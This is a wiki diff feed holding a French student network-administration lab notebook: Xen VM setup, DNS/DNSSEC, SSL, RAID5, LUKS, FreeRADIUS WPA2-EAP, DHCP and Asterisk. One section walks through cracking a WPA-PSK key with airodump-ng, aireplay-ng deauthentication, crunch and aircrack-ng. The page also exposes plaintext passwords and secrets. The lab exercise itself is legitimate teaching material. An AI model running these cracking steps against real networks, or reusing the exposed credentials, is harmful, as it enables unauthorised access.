 [Jan  6 16:12:14] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 665&lt;br /&gt;
   == Using SIP RTP CoS mark 5&lt;br /&gt;
     -- Executing [666@work:1] Dial(&amp;quot;SIP/665-00000000&amp;quot;, &amp;quot;SIP/666,20&amp;quot;) in new stack&lt;br /&gt;
   == Using SIP RTP CoS mark 5&lt;br /&gt;
     -- Called SIP/666&lt;br /&gt;
     -- SIP/666-00000001 is ringing&lt;br /&gt;
     -- SIP/666-00000001 answered SIP/665-00000000&lt;br /&gt;
     -- Remotely bridging SIP/665-00000000 and SIP/666-00000001&lt;br /&gt;
   == Spawn extension (work, 666, 1) exited non-zero on 'SIP/665-00000000'&lt;br /&gt;
 Frotteman*CLI&amp;gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=37060</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=37060"/>
				<updated>2017-01-08T17:42:09Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 : Sécurisation &amp;amp; Certification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1 : Configuration du Bonding=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2 : Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
=Séance3 : Volumes logiques=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5 : DNS=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6 : Sécurisation &amp;amp; Certification=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout faispas.key -out faispas.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
On ajoute les fichiers à notre config :&lt;br /&gt;
&lt;br /&gt;
 cp faispas.crt GandiStandardSSLCA2.pem /etc/ssl/certs/ &lt;br /&gt;
 cp faispas.key /etc/ssl/private/&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# c_rehash /etc/ssl/certs &lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
 faispas.crt =&amp;gt; 82591bcd.0&lt;br /&gt;
 faispas.crt =&amp;gt; a73fda57.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
Génération des clefs :&lt;br /&gt;
 &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
On inclut dans les clés dans le fichier de zone.db :&lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone : &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|500px|thumb|center]]&lt;br /&gt;
&lt;br /&gt;
==Travail à Réalisé==&lt;br /&gt;
===6.1 Raid===&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il a fallu créer les disques virtuels avec ''lvcreate'' :&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid3 -v&lt;br /&gt;
&lt;br /&gt;
Puis il faut rajouter à la config ''/etc/xen/Frotteman.cfg'' :&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid1,xvdd1, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid2,xvdd2, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid3,xvdd3, w',&lt;br /&gt;
&lt;br /&gt;
Une fois ceci fait on redémarre la VM et on installe ''mdadm'' :&lt;br /&gt;
&lt;br /&gt;
 apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
On met à jour les modules du kernel (enfin je crois) :&lt;br /&gt;
&lt;br /&gt;
 apt-get install linux-image.3.16.0-4-amd64&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'à créer notre disque RAID5 ''md0'' :&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
&lt;br /&gt;
Nous installons un système de fichier ''ext4'' dessus:&lt;br /&gt;
&lt;br /&gt;
 mkfs -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant le monter :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour tester nous avons copié en partie le dossier /lib dans /mnt.&lt;br /&gt;
Nous commentons une ligne du fichier /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
 #'phy:/dev/virtual/Frotteman-raid2,xvdd2, x',&lt;br /&gt;
&lt;br /&gt;
Puis nous observons les différents résultats via ''fdisk'' :&lt;br /&gt;
&lt;br /&gt;
 fdisk -l&lt;br /&gt;
&lt;br /&gt;
 Disk /dev/xvdd1: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/xvdd3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/md0: 2 GiB, 2145386496 bytes, 4190208 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 524288 bytes / 1048576 bytes&lt;br /&gt;
&lt;br /&gt;
On observe l'absence du disque xvdd2 mais nous avons en revanche toutes nos données sur /mnt&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# ls /mnt/lib&lt;br /&gt;
 ifupdown			      libipq.so.0.0.0	    startpar&lt;br /&gt;
 init				      libiptc.so.0	    systemd&lt;br /&gt;
 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so  libiptc.so.0.0.0	    terminfo&lt;br /&gt;
 libip4tc.so.0			      libxtables.so.10	    udev&lt;br /&gt;
 libip4tc.so.0.1.0		      libxtables.so.10.0.0  x86_64-linux-gnu&lt;br /&gt;
 libip6tc.so.0			      lsb		    xtables&lt;br /&gt;
 libip6tc.so.0.1.0		      modprobe.d&lt;br /&gt;
 libipq.so.0			      modules&lt;br /&gt;
&lt;br /&gt;
Nous avons même été prévenu via mail par mdadm, c'est bo l'info !!&lt;br /&gt;
&lt;br /&gt;
 From root@faispastomberlasavo.net  Wed Dec  7 17:06:00 2016&lt;br /&gt;
 X-Original-To: root&lt;br /&gt;
 From: mdadm monitoring &amp;lt;root@faispastomberlasavo.net&amp;gt;&lt;br /&gt;
 To: root@faispastomberlasavo.net&lt;br /&gt;
 Subject: DegradedArray event on /dev/md0:Frotteman&lt;br /&gt;
 Date: Wed,  7 Dec 2016 17:05:56 +0100 (CET)&lt;br /&gt;
 &lt;br /&gt;
 This is an automatically generated mail message from mdadm&lt;br /&gt;
 running on Frotteman&lt;br /&gt;
 &lt;br /&gt;
 A DegradedArray event had been detected on md device /dev/md0.&lt;br /&gt;
 &lt;br /&gt;
 Faithfully yours, etc.&lt;br /&gt;
 &lt;br /&gt;
 P.S. The /proc/mdstat file currently contains the following:&lt;br /&gt;
 &lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active (auto-read-only) raid5 xvdd1[0] xvdd3[2]&lt;br /&gt;
       2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
       &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===6.2 Cryptage carte SD===&lt;br /&gt;
Pour crypter les données présente sur un support de stockage nous utiliserons Gparted et CryptSetup&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c eas -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
On rentre notre phrase secrète.&lt;br /&gt;
&lt;br /&gt;
Optionel : On peut afficher l'état du conteneur grâce à la commande :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksDump /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
On peut désormais ouvrir notre volume appelé &amp;quot;frotteman&amp;quot;, il nous faudra ensuite renseigner la clé secrète :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksOpen /dev/mmcblk1 frotteman&lt;br /&gt;
&lt;br /&gt;
On peut désormais formater le volume en ext3&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext3 /dev/mapper/frotteman&lt;br /&gt;
&lt;br /&gt;
Et finalement monter/demonter le volume :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/mapper/frotteman /mnt/&lt;br /&gt;
 umount /mnt &lt;br /&gt;
&lt;br /&gt;
Et également fermé le volume chiffré :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksClose frotteman&lt;br /&gt;
&lt;br /&gt;
===6.6 Securasition Wifi par WPA2-EAP===&lt;br /&gt;
 &lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Puis nous avons eu à configurer nos points d'accès wifi au sein du fichier clients.conf, voici à quoi ressemble la configuration d'un des points :&lt;br /&gt;
&lt;br /&gt;
 client E306{&lt;br /&gt;
         ipaddr = 10.60.1.2&lt;br /&gt;
         secret = password&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne restait plus qu'a créer un utilisateur pour ce serveur d'authentification, pour cela nous avons ajouté la ligne suivante dans le fichier users.&lt;br /&gt;
&lt;br /&gt;
 frotteman Cleartext-Password := &amp;quot;youpi&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Une fois cette configuration réalisée nous avons lancé notre serveur FreeRADIUS.&lt;br /&gt;
Configuration des bornes Wi-Fi&lt;br /&gt;
&lt;br /&gt;
Par la suite nous avons réalisé la configuration des bornes Wi-Fi afin d'avoir notre accès sécurisé avec notre serveur FreeRADIUS. La configuation est réalisée en tapant les commandes suivantes après s'être connecté à la borne via telnet :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 &lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_frotteman group radius_frotteman&lt;br /&gt;
 radius-server host 193.48.57.161 auth-port 1812 acct-port 1813 key password&lt;br /&gt;
 aaa group server radius radius_frotteman&lt;br /&gt;
 server 193.48.57.161 auth-port 1812 acct-port 1813&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 dot11 ssid SSID_FROTTEMAN&lt;br /&gt;
 vlan 2&lt;br /&gt;
 authentication open eap eap_frotteman&lt;br /&gt;
 authentication network-eap eap_frotteman&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
 encryption vlan 2 mode ciphers aes-ccm tkip&lt;br /&gt;
 ssid SSID_FROTTEMAN &lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 no ip route-cache&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 bridge-group 2 subscriber-loop-control&lt;br /&gt;
 bridge-group 2 spanning-disabled&lt;br /&gt;
 bridge-group 2 block-unknown-source&lt;br /&gt;
 no bridge-group 2 source-learning&lt;br /&gt;
 no bridge-group 2 unicast-flooding  &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 interface GigabitEthernet0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
  &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===6.8.1 DHCP===&lt;br /&gt;
On installe un server DHCP sur l'eeePC :&lt;br /&gt;
&lt;br /&gt;
 apt-get install isc-dhcp-server&lt;br /&gt;
&lt;br /&gt;
On configure le fichier /etc/dhcp/dhcpd.conf :&lt;br /&gt;
&lt;br /&gt;
 option domain-name &amp;quot;faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
 option domain-name-servers 193.48.57.161;&lt;br /&gt;
 &lt;br /&gt;
 subnet 10.60.2.0 netmask 255.255.255.0 {&lt;br /&gt;
       range 10.60.2.50 10.60.2.100;&lt;br /&gt;
       option routers 10.60.6.1;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'a indiqué notre interface réseau dans le fichier /etc/dhcp/isc-dhcp-server&lt;br /&gt;
 &lt;br /&gt;
===6.8.2 PCBx===&lt;br /&gt;
&lt;br /&gt;
On installe asterisk &lt;br /&gt;
 apt-get install asterisk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/asterisk/sip.conf afin de créer 2 utilisateurs 666 &amp;amp; 665:&lt;br /&gt;
&lt;br /&gt;
 [general]&lt;br /&gt;
 hasvoicemail=yes&lt;br /&gt;
 hassip=yes&lt;br /&gt;
 hasiax=yes&lt;br /&gt;
 callwaiting=yes&lt;br /&gt;
 threewaycalling=yes&lt;br /&gt;
 callwaitingcallerid=yes&lt;br /&gt;
 transfer=yes&lt;br /&gt;
 canpark=yes&lt;br /&gt;
 cancallforward=yes&lt;br /&gt;
 callreturn=yes&lt;br /&gt;
 callgroup=1&lt;br /&gt;
 pickupgroup=1&lt;br /&gt;
 nat=yes&lt;br /&gt;
 &lt;br /&gt;
 [666]&lt;br /&gt;
 type=friend&lt;br /&gt;
 host=dynamic&lt;br /&gt;
 dtmfmode=rfc2833&lt;br /&gt;
 disallow=all&lt;br /&gt;
 allow=ulaw&lt;br /&gt;
 fullname=Cduval&lt;br /&gt;
 username=cduval&lt;br /&gt;
 secret=glopglop&lt;br /&gt;
 context=work &lt;br /&gt;
 &lt;br /&gt;
 [665]&lt;br /&gt;
 type=friend&lt;br /&gt;
 host=dynamic&lt;br /&gt;
 dtmfmode=rfc2833&lt;br /&gt;
 disallow=all&lt;br /&gt;
 allow=ulaw&lt;br /&gt;
 fullname=Pfitouss&lt;br /&gt;
 username=pfitouss&lt;br /&gt;
 secret=glopglop&lt;br /&gt;
 context=work &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc constater que le communication est réussi&lt;br /&gt;
 Frotteman*CLI&amp;gt; sip show peers&lt;br /&gt;
 Name/username             Host                                    Dyn Forcerport Comedia    ACL Port     Status      Description                      &lt;br /&gt;
 665/pfitouss              (Unspecified)                            D  Auto (No)  No             0        Unmonitored                                  &lt;br /&gt;
 666/cduval                (Unspecified)                            D  Auto (No)  No             0        Unmonitored                                  &lt;br /&gt;
 2 sip peers [Monitored: 0 online, 0 offline Unmonitored: 0 online, 2 offline]&lt;br /&gt;
     -- Registered SIP '665' at 10.60.2.100:38862&lt;br /&gt;
 [Jan  6 16:10:49] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 665&lt;br /&gt;
     -- Registered SIP '666' at 10.60.2.101:35192&lt;br /&gt;
 [Jan  6 16:12:06] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 666&lt;br /&gt;
